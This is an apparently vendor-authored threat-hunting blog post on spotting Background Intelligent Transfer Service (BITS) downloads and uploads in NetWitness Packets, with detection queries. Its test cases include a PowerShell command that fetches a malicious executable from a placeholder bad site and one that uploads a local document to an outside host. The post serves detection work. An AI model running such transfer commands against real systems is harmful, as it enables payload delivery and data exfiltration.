Justin Grosfelt

Identifying BITS Uploads and Downloads

Blog Post created by Justin Grosfelt Employee on Mar 20, 2017

Part 1: NetWitness for Packets

I recently read an article from Microsoft (https://msdn.microsoft.com/en-us/library/windows/desktop/ee663885%28v=vs.85%29.aspx#to_create_a_synchronous_bits_transfer_job_with_multiple_files) describing how to use the Microsoft Background Intelligent Transfer Service (BITS) to perform file transfers. While not common, BITS has been used for downloading malware or uploading documents in past attacks. This got me wondering how I would identify this activity in NetWitness Packets.

 

There are two scenarios’ I tested:

  1. Powershell/BITS used to download files from remote server
  2. Powershell/BITS used to upload files from a local machine

 

Scenario 1: Powershell/BITS used to download from remote server

For this scenario, I am simulating a PowerShell command that is run on a machine local to an organization and attempts to download a malicious executable. Just to note, I have chosen to download a malicious executable to better illustrate the scenario, however, any file-type could be downloaded using this method. Below is the PowerShell command I used:

 

PS C:\Users\moss> Start-BitsTransfer -Source http://www.badsite.com/badfile.exe -Destination C:\Users\moss\temp.exe

 

Now if we were to examine this communication in NetWitness Packets we would see something similar to Figure 1. BITS will follow the HTTP protocol to retrieve the remote file. There are two important artifacts to notice, first is the use of the HEAD in the initial request. HEAD is similar to a GET, except it checks to see if the resource is present.  The second artifact is the use of the 'Microsoft BITS/7.5' User Agent, this User-Agent is specific to BITS communication.

 

Figure 1: BITS HEAD Request

 

If BITS receives notification that the resource is available, it then initiates a GET request for the resource as shown in Figure 2.

 

Figure 2: BITS GET Request

 

If you would like to examine BITS downloads in your organization using NetWitness Packets, the below query/rule can help:

 

direction='outbound' && client contains 'Microsoft BITS'

 

Scenario 2: Powershell/BITS used to upload files from a local machine

This scenario isn't all that different then Scenario 1, as we are uploading a file to a remote site instead of downloading. The PowerShell command I used is below:

PS C:\Users\moss> Start-BitsTransfer -Source ‘C:\Users\Moss\badfiletoupload.docx’ -Destination

http://uploadwebsite.com' -TransferType upload

For inspection in NetWitness Packets, I expected to see a POST method instead of a HEAD/GET and that the same User-Agent, 'Microsoft/BITS7.5' would be used. And as you can see in Figure 3, this assumption is wrong, well sort of.

Figure 3: BITS_POST

BITS uses its own protocol on top of HTTP for data uploads identified by the ‘BITS_POST’ in the HTTP Header. Additional information on the BITS upload protocol is detailed here,

https://msdn.microsoft.com/en-us/library/windows/desktop/aa362828(v=vs.85).aspx. The general traffic flow between the client and server is as follows:

Figure 4: BITS POST Protocol

 In NetWitness Packets, we can follow the Requests/Responses to see the protocol in action.

Figure 5: BITS POST Protocol in NetWitness Packets

Identifying BITS downloads and uploads may be useful additions to your hunting methodology and can be found using the below Rules/Query:

BITS Download: direction='outbound' && client contains 'Microsoft BITS'
BITS Upload: action='BITS_POST' && client contains 'Microsoft BITS'

Happy Hunting,

Justin

Outcomes